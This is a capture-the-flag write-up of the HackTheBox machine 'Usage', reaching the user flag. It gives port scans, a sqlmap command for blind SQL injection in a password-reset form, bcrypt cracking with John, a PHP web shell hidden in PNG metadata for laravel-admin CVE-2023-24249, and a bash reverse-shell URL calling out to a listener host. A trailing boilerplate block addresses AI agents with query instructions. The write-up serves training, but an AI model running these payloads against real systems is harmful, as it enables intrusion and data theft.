# Usage

## User Flag

### Enumeration

massscan & nmap & dirsearch like usual

```xml
/bin/cat masscan_10.129.36.167
<?xml version="1.0"?>
<!-- masscan v1.0 scan -->
<nmaprun scanner="masscan" start="1716243183" version="1.0-BETA"  xmloutputversion="1.03">
<scaninfo type="syn" protocol="tcp" />
<host endtime="1716243183"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<host endtime="1716243303"><address addr="10.129.36.167" addrtype="ipv4"/><ports><port protocol="tcp" portid="80"><state state="open" reason="syn-ack" reason_ttl="63"/></port></ports></host>
<runstats>
<finished time="1716243330" timestr="2024-05-21 05:15:30" elapsed="205" />
<hosts up="2" down="0" total="2" />
</runstats>
</nmaprun>
```

```bash
/bin/cat nmap_detailed_all_tcp_ports.txt
# Nmap 7.95 scan initiated Tue May 21 05:15:56 2024 as: nmap -p "80, 22" -sVSC -A -oN nmap_detailed_all_tcp_ports.txt -v2 10.129.36.167
Nmap scan report for 10.129.36.167
Host is up, received echo-reply ttl 63 (0.044s latency).
Scanned at 2024-05-21 05:15:57 WIB for 9s

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/21%OT=22%CT=%CU=34514%PV=Y%DS=2%DC=T%G=N%TM=664BCBA6
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CST11
OS:NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)

Uptime guess: 42.218 days (since Tue Apr  9 00:02:51 2024)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   51.32 ms 10.10.14.1
2   51.48 ms 10.129.36.167

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 21 05:16:06 2024 -- 1 IP address (1 host up) scanned in 9.89 seconds
```

testing all features. we know sqli in the /forgot\_password

### Exploitation

Blind sqli boolean based in /forgot\_password on port 80 in the email section

```bash
sqlmap -r ~/Desktop/Prod/HackTheBox/machine/Usage/req.txt --batch --level 5 --risk 3 --dbms=mysql --dbs --dump
```

got the dump of all db&#x20;

<figure><img src="/files/Em9HOh9QZLxrr4BYVW4Y" alt=""><figcaption></figcaption></figure>

lets input to password cracker&#x20;

```bash
john Administrator.hash --wordlist=/home/replican/Desktop/Prod/CyberSecurity/seclists/Passwords/Leaked-Databases/rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
whatever1        (?)
1g 0:00:00:04 DONE (2024-05-21 06:56) 0.2347g/s 380.2p/s 380.2c/s 380.2C/s runescape..serena
Use the "--show" option to display all of the cracked passwords reliably
Session completed
```

<figure><img src="/files/uAX35O7qNra2O7vD0MDF" alt=""><figcaption></figcaption></figure>

after sometimes&#x20;

<figure><img src="/files/HSL4o6qkYYpStunpZk0W" alt=""><figcaption></figcaption></figure>

we know this laravel-admin. now we find the public cve for this and i search "laravel-admin cve" and i found this CVE-2023-24249

{% embed url="<https://flyd.uk/post/cve-2023-24249/>" %}

```bash
convert -size 25x25 xc:none -colors 256 output.png && exiftool -Model='<?=system($_GET["x"])?>' output.png && mv output.png $(cat /proc/sys/kernel/random/uuid).png
```

after that we upload and intercept and make it .png.php&#x20;

and we get the shell

<figure><img src="/files/b1sWMEYnIHlJqN5SrIx4" alt=""><figcaption></figcaption></figure>

and then we revshell&#x20;

```url
http://admin.usage.htb/uploads/images/exploit.png.php?x=bash%20-c%20%22sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.14.45%2F1337%200%3E%261%22
```

and then we go to /home/dash and we get user flag


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://n2l-cysec.gitbook.io/notes/hackthebox-writeup/usage.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.